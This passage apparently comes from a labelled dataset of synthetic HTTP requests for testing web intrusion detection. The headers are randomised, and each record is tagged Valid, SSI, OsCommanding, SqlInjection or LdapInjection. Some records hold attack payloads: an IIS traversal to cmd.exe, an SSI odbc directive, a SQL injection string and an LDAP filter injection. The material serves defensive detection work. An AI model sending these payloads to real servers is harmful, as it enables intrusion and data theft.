If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Mon, 22 May 06 11:55:34 UTC
If-Match: "s73n6l@MZB6r9fOBG"
If-None-Match: "sW9tBDDa1bTwnwhx"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: Digest nonce
Range: -972338,855782-
Referer: http://www.saa4.biz/u18ltdh.jpeg
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: oesn0nhq/6.8.6.3
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.5 www.ibmt0eie.tiff
Transfer-Encoding: aHmEh; enii=cWIrnon
Upgrade: oEAO/0.4, NrmE/9.1, 2tirU/3.2, dprdqi/9.1, ejn2sn/3.5
Warning: 290 81.121.41.20 "1erpeehEtorXv" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37131
Start - Id: 40758
class: SSI
PUT /nonA/eFyq/cgiiht51oga31ttsox.cfm? HTTP/1.0
Content-Length: 141
Content-Language: ujbo,hsai1lth,ihail
Content-Encoding: identity
Content-Location: http://netago9l.gov/rtnhed6R/ikau.pl
Content-MD5: dGFpcnFmbHQ3Z2ZSdzl0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Mar 07 06:23:14 CET
Last-Modified: Tue, 31 Jan 06 22:52:31 UTC
Host: www.oenei.uk
Connection: close
Accept: text/*, image/jpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: otewaS-c;q=0.2, huireih-gl, epm-j;q=0.9
Cache-Control: min-fresh=63011
Client-ip: 166.41.33.129
Cookie: ihab8=atewerl4nrodos7scf;18dnp9a=tdazDzmlDGD;iIbeeyo=awgse8sh;taibnoml=7795183019;oNd1yioawod=tit;rpfoa=mbody
Cookie2: $Version="570"
Date: Sun, 13 Jul 08 22:44:53 GMT
ETag: W/"StD9lTanH-1yt1o"
Expect: 100-continue
From: udrrhl@hosiFeige.gov
If-Modified-Since: Wed, 18 May 05 21:34:40 CET
If-Unmodified-Since: Fri, 14 Mar 08 23:03:28 GMT
If-Match: *
If-None-Match: "kqtHaqiIYu5K5uLb@f"
If-Range: "EsMwW-wwJZlAOTrJ2d"
Max-Forwards: 9
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest response="1Ed1304da8fcfFAe8991Ad5B48185A87"
Range: -5,-6430,4139-
Referer: http://www.Odnt5a.be/ernnl/jeiuF/eeft/otSnvtng.tiff
TE: trailers,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 6.5; oi-or; rv:9.6.6) Gecko/61981623
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: urtex/7.8 www.Sib1r.html, 3.6 70.226.250.186:394, 0.7 www.uhy2dur.gif
Transfer-Encoding: aepo; dote=yhrmrgd
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

fo=<!--#odbc     connect="achpe,iinkf,tpeio"     statement="select    *    from    Stia"-->&uEd=ldoCRwr&eesnt=3092705

End - Id: 40758
Start - Id: 9541
class: Valid
GET /r6D/snsiHooi6h7ca/rEIXg8y/oH6.pf.swf?NrhVdaTt=8etcsrreplace%5C%7C7n%24%3F%26tih&eoo9nr=eIR HTTP/1.0
Host: www.Iiraitcet9.gov:93153
Connection: inneCtie
Accept: text/html;q=0.5, image/*, video/quicktime;q=0.9
Accept-Charset: x-mac-arabic;q=0.6, x-mac-greek;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 213.232.44.132
Cookie: ubsksr=ibi'cadd- jorfl;aosoadaRdee2=0;notisedcb1oere=mb0vs;dewzmkah3be=01
Cookie2: $Version="31"
Date: Mon, 23 Jun 08 23:56:47 CET
ETag: W/"@ooEB@uaCNN9tFEzz0"
Expect: 100-continue
From: anp51@cLdyyihltw.st
If-Modified-Since: Wed, 01 Dec 04 16:09:33 UTC
If-Unmodified-Since: Fri, 29 Sep 06 08:35:21 GMT
If-Match: "twqlIPm-Tlu.dIvL"
If-None-Match: *
If-Range: Fri, 08 Apr 05 18:53:39 GMT
Max-Forwards: 34
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest username="uheeYg"
Authorization: Basic b29qdE5qdDo1c0VpRWk=
Range: -473707,-784763,883586-54671
Referer: /njwihewe/oelnfLs.txt
TE: gzip,deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/4.3 (X11; U; Open BSD i386 4.2; oq-Os; rv:6.6.3) Gecko/07703992
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1124x1179
Via: 2.4 www.9oiearla.js, 5.6 www.to3at.htm, 2.4 www.0aeps2.png
Transfer-Encoding: gzip
Upgrade: 4iso6y/9.0, dql/9.6, mrw/5.2
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 144.11.11.49
X-Serial-Number: 2426894
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9541
Start - Id: 10067
class: Valid
GET /uzfb3poole/_IEltnLAW/pqa6ii7wjddbmvnox/he3eo/e8rz/VmailLnMI2E9X-Fj.swf?xhHnB=nw&shtLeCieE=436&uoi=esanlhfkir&nnReavhai6d=t HTTP/1.0
Host: 65.217.244.75
Connection: close
Accept: audio/x-wav, application/zip, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: dkMqEg-tmnazcR;q=0.3, sEDt-rho;q=0.7, sDa35goT-9oNxrtq, ciwe-figtuiqt;q=0.3, ayeiw7-SEnda;q=0.4
Cache-Control: max-age=08
Client-ip: 104.169.228.37
Cookie: Chissh=a\iS
Cookie2: $Version="93"
Date: Mon, 25 Feb 08 17:45:21 GMT
ETag: W/"fZL-CgdQBuZcfNUqK"
Expect: lxltoMtt=olvdcho;8ecooa=lrlnd
From: aemYeste@u736nnw.biz
If-Modified-Since: Sun, 18 Oct 09 12:48:30 GMT
If-Unmodified-Since: Mon, 09 Feb 04 07:49:28 CET
If-Match: *
If-None-Match: "DSCC59jVe2Um5sKzr"
If-Range: Mon, 21 Sep 09 15:49:18 CET
Max-Forwards: 4027
MIME-Version: 4.0
Pragma: rezph='b0ecodt'
Proxy-Authorization: flkeb doigltee=bandt
Authorization: Basic azEzaWg6c1lmNXg=
Range: 0143-8
Referer: http://www.cwemh7.biz/sbeeoo/kueis/ewisumx/mhida.bin
TE: gzip;q=0.8,trailers,trailers
Trailer: Host
User-Agent: dbeoeycq/4.6
UA-CPU: 68000
UA-Disp: 046,3752,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6453x8240
Via: osgsr/4.0 www.gatlrwn.tiff, 0.9 www.Tttb0q.jpeg:2824
Transfer-Encoding: identity
Upgrade: dioExt/5.6, 5ost/5.4
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 905480693565962672
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10067
Start - Id: 15171
class: Valid
GET /nycumnnh/maaHho2Mdljsetpr/2z5BN/eitehyymY1nrtauri5/dadg/tZQ/openJCic8tchild/ryy/o6YPd1T0A4rI0pw9.php?aAmlib=5cur&n8goO=ie%5Dtservicesnode8twiRneee&roscisypn=nnnchfu&xaEsayebtsio2=ntpeheri&msdtithlerY5=1393&ajfSpunp4omtn8=nuncriehcf%5DiI&CAVUfN=Uln7e0neNservices&oem4wuJeDeTu=a&lE=geah&tzhbw=78&d9pc=Aoauuhkmienkioe HTTP/1.1
Host: www.tb0mrwoo.be
Connection: bmbti4er
Accept: text/xml, audio/x-wav;q=0.1, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 41.201.209.63
Cookie: nasIlOauo4=>An9fdog$httpsrt;ahxlwtkeess=6196;kohglq=97;eEoedcfpte3sno=e9F8qe.ED
Cookie2: $Version="478"
Date: Wed, 14 Apr 04 20:50:24 CET
ETag: W/"afgy9PrweSHyXihyD"
Expect: dS0aus1=aho6;ayt4=etsiBq0
From: a5ts9lfp@poamgw.cz
If-Modified-Since: Tue, 02 Aug 05 13:05:53 UTC
If-Unmodified-Since: Thu, 11 Jun 09 20:43:48 CET
If-Match: "a.N_yQ6V5NjavnFtva@p"
If-None-Match: *
If-Range: Fri, 21 Nov 08 13:29:43 UTC
Max-Forwards: 7
MIME-Version: 5.5
Pragma: ttaoe=6nmyeO
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: hkqi aaA8Paa=h9oa
Range: -96,366774-,-767
Referer: http://pnil.de/K2ufEsEd/tpllehe/tn6rea9p/i7ct/vtiaO.exe
TE: gzip;q=0.6,trailers
Trailer: User-Agent
User-Agent: tufettoaemte
UA-CPU: PowerPC
UA-Disp: 1668,172,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1372x650
Via: HTTP/6.7 242.92.254.242
Transfer-Encoding: deflate
Upgrade: emoNct/7.8
Warning: 690 www.t1telndw.html:946 "arsnbcneaieqbgnpwaea" 
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 54307917779872
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15171
Start - Id: 29585
class: Valid
GET /mtnx9arwera.cgi? HTTP/1.0
Host: 185.201.210.229
Connection: otAi
Accept: audio/x-wav;q=0.9, text/html;q=0.6
Accept-Charset: cp-932;q=0.9, x-mac-icelandic;q=0.1, x-mac-japanese;q=0.8
Accept-Encoding: 
Accept-Language: m-mhlg, ic0eec-n4RbRo
Cache-Control: only-if-cached
Client-ip: 100.140.145.133
Cookie: uIatocbeia=s~%o
Cookie2: $Version="6"
Date: Sun, 16 Aug 09 14:00:40 CET
ETag: W/"R8IqnBOAH7IGFUVH"
Expect: Umiwbt
From: d1em@0njeio.be
If-Modified-Since: Tue, 12 Feb 08 04:46:47 GMT
If-Unmodified-Since: Tue, 09 Feb 10 17:01:08 CET
If-Match: "_diIQnrfXAKX5R99enS"
If-None-Match: *
If-Range: Wed, 27 Feb 08 10:44:28 CET
Max-Forwards: 5
MIME-Version: 6.8
Pragma: a1Wrde=bgr
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: NTLM aWJ5RW5ieWxsY2NudHZBdERzQXVwYzRubG9vZWRzd3k2
Range: -5036
Referer: /lteeshts/ohohiouo/eYjto/hhut3f/eNiat.mdb
TE: gzip,chunked
Trailer: Trailer
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 7.0; bt-en; rv:1.0.7) Gecko/29427552
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: 2.8 www.aheolc.tiff, FTP/7.4 www.mo07.htm, HTTP/2.2 109.187.126.176:0968
Transfer-Encoding: deflate
Upgrade: Emr/4.4, hOmt/0.0
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29585
Start - Id: 10561
class: Valid
GET /laeide/aiehrrrvfee/eodcie8dcspSowRN/fyoX@OLQ3SMDUb2./pLfjPwhereimgj--/be1iretfgoe.swf?ck=58&6fzpdb=012&enstinmms4or=eialskrogsstUg&r84rne6EipttSo=%28&yruop6crqaHebno=anif&hojEiwssoctsNo=http-t&brs5a1ruf=eunsock_stream&eaen3tmhclet=Rptm41IehTd5wsoBds&mbt=8632575&Bikvt6BR6JU7=u%2FipsRidropb-&wa=fcb3&urt8c0ennkboh=+x%3Fiarj9gnstee HTTP/1.0
Host: www.geash.biz:80
Connection: close
Accept: image/png, video/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: h-acb6;q=0.0, iiypi-vd;q=0.9, rdol-ELfo;q=0.5, uvtEsdrf-ohLrta;q=0.0, e-n5ahIret;q=0.6
Cache-Control: no-transform
Client-ip: 212.99.205.26
Cookie: 0eIm2tuhoeoo=6oermueggg;zD6uCCbodyPperlcat=37474123;y75s=t$;aotihle0tnioae=10;xuenAJ=adeletemd6;nH=iuiere4r
Cookie2: $Version="1"
Date: Sun, 15 Feb 04 04:35:22 GMT
ETag: W/"kL3Wuo_njT2QspXQcQ"
Expect: emcl6ume=loninsNe
From: lienea@fkubr8mmw0.cz
If-Modified-Since: Thu, 12 Feb 09 04:43:54 GMT
If-Unmodified-Since: Wed, 02 Nov 05 18:25:43 GMT
If-Match: *
If-None-Match: "ji55JNrwSeJ7rkNz-f"
If-Range: "dXVkpvvvzrYPY4MGQe"
Max-Forwards: 41
MIME-Version: 6.8
Pragma: GrcqUen=oneii
Proxy-Authorization: alSU 6ondetj=aeaaiO
Authorization: Basic dG5oaWRkbXU6c3Jzc2s=
Range: -9,-599192
Referer: /lulcTn/leseTa3/0lir/8ens/0slhlsn.gz
TE: trailers
Trailer: Date
User-Agent: IBiamt/8.3.3
UA-CPU: Sparc
UA-Disp: 162,192,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2627x335
Via: 2.3 3.143.194.238, HTTP/4.6 www.tg2mnnh.html, 9.4 3.39.17.122
Transfer-Encoding: compress
Upgrade: aianh/8.9, rdvq9p/7.9, srh/6.2
Warning: 945 244.191.10.199 "Pealdat" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 72395720
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10561
Start - Id: 27534
class: Valid
GET /pYA3Q/2B9Wts11L/tzhgw/lt5ni/sllfdg/urn/viAu/2n2ttOhbbehiategeeo/madmin/rotoeeOqon/ylrnvren6scjwnoM8/tm.bin?anaariasiw4h=%3C+oy%5B HTTP/1.1
Host: www.tejsiesGt.it:80
Connection: keep-alive
Accept: application/*, audio/x-wav;q=0.8
Accept-Charset: x-mac-arabic;q=0.9, koi8-r
Accept-Encoding: *;q=0.8
Accept-Language: mthpfda-lbbmtamu, a1-Ua;q=0.8, lmo-prvd, ehp-l
Cache-Control: max-age=281
Client-ip: 34.117.164.116
Cookie: e6=62 otoWwel;tsch1os5ortI3=De ansmesAh;uueNiadzrae=hcopyrns;7NEn=)[bopsi'EeL6ucmd2h
Cookie2: $Version="154"
Date: Sat, 30 Sep 06 20:28:50 GMT
ETag: "azKNpm9J3e5h8jF"
Expect: d4e28saC
From: ieeycl@guH1br.uk
If-Modified-Since: Thu, 30 Apr 09 07:35:43 GMT
If-Unmodified-Since: Fri, 13 May 05 18:27:40 UTC
If-Match: "5lJQUcY6mWcu9Ll6"
If-None-Match: "3X8N.bsJe@ecT@-RWl"
If-Range: Fri, 10 Apr 09 11:14:08 GMT
Max-Forwards: 9
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic d2xCaTpiNlRlOFM=
Range: -46102,418194-41076
Referer: /awhipe/ior2Ccgt.php4
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: yiaN7reeweeessim
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 3.3 27.67.167.86:9, HTTP/0.3 www.atyjft.css, asieye/0.3 171.58.108.232
Transfer-Encoding: gzip
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27534
Start - Id: 43880
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 176.28.163.192
Connection: keep-alive
Accept: video/*, video/mpeg;q=0.5
Accept-Charset: x-mac-greek;q=0.9
Accept-Encoding: deflate;q=0.4
Accept-Language: dbLla-e6Ea;q=0.1, s0ecl-eIt3am
Cache-Control: min-fresh=375
Client-ip: 184.162.182.17
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="4"
Date: Sun, 28 Jun 09 09:33:09 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: etc4ouNl=anmics2L
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: "KiU7@bvDPHIT1YhJLI"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: "sEmGKjYhKUj0AqLv08J"
Max-Forwards: 063
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dkVhczg6c2V0cG9laHA=
Range: 40517-,9-9675
Referer: http://nEtmEdt.org/stheiwtO.js
TE: gzip;q=0.3
Trailer: Accept-Language
User-Agent: all7zu
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/4.6 www.Euuyn.tiff, hgtot5/2.0 31.213.183.2, agmfan/5.2 136.43.101.187
Transfer-Encoding: compress
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 www.odeL.tiff "cuhEDNroai" 
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43880
Start - Id: 41743
class: SqlInjection
GET /es5txo0uq/XZYApQ/ocsn/z4sycPT@/n0wG4.KdhhXW2m1ro/Bobject9LEoR3@services1/l4t5dx/esnhlw/hnswwhru.nsf?DW02=a&qjcxu=%3Dnawp-Ipib%7E+%3Eformlh%25%7Ct&ltotrmtto=samNmetaSos%7Ce+rey2opfreplacen&lcia=letu&nTu0oqelMh=childfsse2eeefstenaa&gsrro6ynu=s%7C+a&K1k1Mrn=aCCA5e%40tO&fcii=wget%26od&HZAeIWKl=inlocationP%3Fpn&ovoea9tccot8oh=xk3ISY2CJn-h&tRprocessing-instructionlmI=%27select++++customer_phone+%27%7C%7C%27from++customers+%27%7C%7C%27where+customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27+++and++++customer_type%3D1%27%3B HTTP/1.1
Host: 88.172.113.155:59
Connection: keep-alive
Accept: text/html
Accept-Charset: euc-kr, x-mac-greek;q=0.7, iso-8859-2, euc-tw;q=0.3, us-ascii;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 136.31.14.94
Cookie: bea=15
Cookie2: $Version="2"
Date: Sat, 16 Jun 07 03:07:28 GMT
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: m9O9rhi
From: AEeu@io5oeTS.be
If-Modified-Since: Thu, 23 Jun 05 17:50:39 CET
If-Unmodified-Since: Thu, 15 Feb 07 05:30:17 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: "Qb3J5Ez19jpJNWFv2K"
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 3
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Digest opaque="ciu9uft"
Range: -8,159-66651,7-
Referer: /nitLaf2/whmLetom/tIouaa/rxu8e0tl.jsp
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: fjotNiuRa
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: FTP/9.8 29.30.180.183
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41743
Start - Id: 10947
class: Valid
GET /uydtHahs/3k94cx/n8/bifWv8EZto0.html? HTTP/1.0
Host: www.tiaoel6t.st
Connection: keep-alive
Accept: image/gif;q=0.1, image/*;q=0.5
Accept-Charset: x-mac-ce;q=0.8, utf-8
Accept-Encoding: deflate, identity;q=0.6, gzip;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 114.65.2.162
Cookie: mLn4r2eePneooto=object;m5SjomufAwlec=pOSE@asn;CBhttp5=tXMon;chtais5m=cy=D;icyme=34
Cookie2: $Version="384"
Date: Thu, 25 May 06 12:28:36 GMT
ETag: W/"0LVYuIes_JnrMLKXJ51"
Expect: 100-continue
From: teehrre@wibas.it
If-Modified-Since: Wed, 03 Jan 07 06:25:43 UTC
If-Unmodified-Since: Sat, 25 Oct 08 06:13:40 GMT
If-Match: *
If-None-Match: "UIsUFRFWfbGW3OBsLCHz"
If-Range: "YmOS393Fx89WCsrc"
Max-Forwards: 8006
MIME-Version: 6.9
Pragma: luiet=pdkl3
Proxy-Authorization: Digest uri=/masy/3d1sew/seq8u.cgi
Authorization: NTLM YXR0dWdlRGVlZWllb29pdGNyN2NBdGliZ0VuQ3RuQmNIdHIzOXNjdA==
Range: 459-,-939336,-414577
Referer: /hasb/ckrr/autc5/oehe.tar.gz
TE: trailers,chunked
Trailer: Accept-Encoding
User-Agent: gsceRsoaduhn5snrar
UA-CPU: 68000
UA-Disp: 9552,487,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7346x718
Via: 3.8 140.223.252.109, HTTP/5.2 www.slrd.css:497, ycati/8.6 197.194.140.102
Transfer-Encoding: 3abtG; ondt6c=eberiat
Upgrade: ocou/9.0, etdase/9.0, hnh/9.3
Warning: 917 173.28.222.9 "HHlwrlufhgiWi" "Tue, 01 Feb 05 01:45:23 GMT"
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 7726046742013389
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 10947
Start - Id: 36513
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ouets.org
Connection: close
Accept: application/*, video/*;q=0.3, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=99
Client-ip: 138.104.69.2
Cookie: wRR8hdropnLE=33o;SIYTtt4f-=96;UGlYCpm= pschildhlincludesosonullorcp;nzTtfI=&v eRi~;nntWthsu=su;lstoltOsEiyih=9798
Cookie2: $Version="50"
Date: Sat, 14 Mar 09 19:35:51 UTC
ETag: "1JyJiea6NiTkziWUK"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Thu, 25 Aug 05 20:27:25 UTC
If-Match: "lwECCqPtth.J3ClJuJ"
If-None-Match: *
If-Range: *
Max-Forwards: 3924
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM NzdyNnRvcmFiYTJhdHNvZGxheG5tbmVzb2ltbmtpaUV4dXhvcmFpcw==
Range: 7303-,26337-
Referer: http://psieniy.st/hiwoaitd/eisogat/eretrao/utgkDsez.wmn
TE: trailers,gzip
Trailer: If-Modified-Since
User-Agent: 9RsKuqa9h7 (l9DEZA; t6RCBq65n)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9877x8489
Via: FTP/9.5 www.bth5n.jpg, 8.5 www.teEd5.html, 2.5 130.222.178.34
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36513
Start - Id: 18125
class: Valid
GET /h94/r0aevathtrssahl/G_K3U2D4-JiGbP/jvbZOu/Cs4o/2phodnoaboliotjn/mOi5/zhW/aAbstTasl/iPbLeZCHWuHxN/qNMner29Erreetn/6MWeau2.asp?snslrojracmtt=EvarVa+m%3Aocopy%3E&homunltIieBrE=rNshthtenilE&m8Zolistno=510992&G37samX8Dqg5N=s HTTP/1.0
Host: www.hEenOhpcd.de:84
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 192.8.141.6
Cookie: bs3=sb;ud1Ad=ioirz'x<atsatnWcpasswdI;eerto=381;adreh3ttetuek=eC0ettltl;hIvincludeg2yQ=6858;enragwexikbebx=e eesr@perl
Cookie2: $Version="10"
Date: Fri, 04 Aug 06 08:18:25 CET
ETag: W/"rhcS_4hO9_XEsNz8dd"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Thu, 18 May 06 14:55:22 CET
If-Unmodified-Since: Sun, 10 Jan 10 03:53:40 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 4
MIME-Version: 3.6
Pragma: iisi=d
Proxy-Authorization: NTLM MW9zZVRwc2lvdnJtY2NkSWFxeWVlMmxybmN0eWlvaWFhcGl6ZmU5aVNybTdqbzA=
Authorization: Digest response="Ad8E23477426A4d43BCEB1CbCdbD870f"
Range: 24-,21839-647
Referer: http://www.nhpn.de/ss8faade/iefh/SpdmdAee/slyeuhp.png
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.5 (compatible; an4tres5r; Solaris; Onaulg2)
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: 7.7 www.triJm.js, FTP/0.2 167.115.255.160
Transfer-Encoding: identity
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 432 www.uatfoT.gif "ojer8gtnteao0ut" "Wed, 24 Mar 10 12:45:46 GMT"
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18125
Start - Id: 37796
class: LdapInjection
GET /e-SEODpdbIr9Gn7/DkGFSWA7i0yD1o/yaiedimt5cpnebn.shtml?2p9k=odjdtfeInoyo&sfg=sieepsa&y9eeTotPwt4edba=+2+ba&rmtha=a9FUBrfoY&6gcT0er=osJ7z&ztea8=%29+++%28+%7C%28bw%3Dmlau*%29&tla=6267052016&ehriagratut0=nbnmmsotw2da&ihth=nph-A3n7ugfr7&Tr58geEenaaeno6=21childa&udiNe=pqtzaeubvf+eiHT&5mn=8217448&cdf7kiotVy9eduo=hsbp&bihepsir=dTLzlTteS HTTP/1.0
Host: 57.136.127.105:80
Connection: iTatcwn
Accept: video/*
Accept-Charset: x-mac-ce, iso-8859-4;q=0.1, cp-932, windows-874
Accept-Encoding: 
Accept-Language: siNa-agteeVe;q=0.6
Cache-Control: l0=ftlo
Client-ip: 88.4.33.9
Cookie: aeoea9s=noaM;hr=yGU;FOOQfrom.Z_8=hetihahn
Cookie2: $Version="375"
Date: Sat, 22 Aug 09 22:04:54 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: h2tit=i1adelef
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sat, 15 Apr 06 15:08:10 CET
If-Unmodified-Since: Fri, 12 May 06 01:57:26 CET
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: "sDHMbGRcQ.TLhLogSSNl"
If-Range: Tue, 29 Dec 09 11:28:05 CET
Max-Forwards: 1198
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest nc=bC8DDEDe
Range: 33-,197469-1
Referer: http://www.N5ezpa.org/ni2s/ubnii.jpg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.5 (X11; U; Open BSD i586 9.7; Ii-2d; rv:0.6.5) Gecko/53282195
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 9.5 12.189.233.108:313
Transfer-Encoding: gzip
Upgrade: et7h/0.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37796
Start - Id: 17902
class: Valid
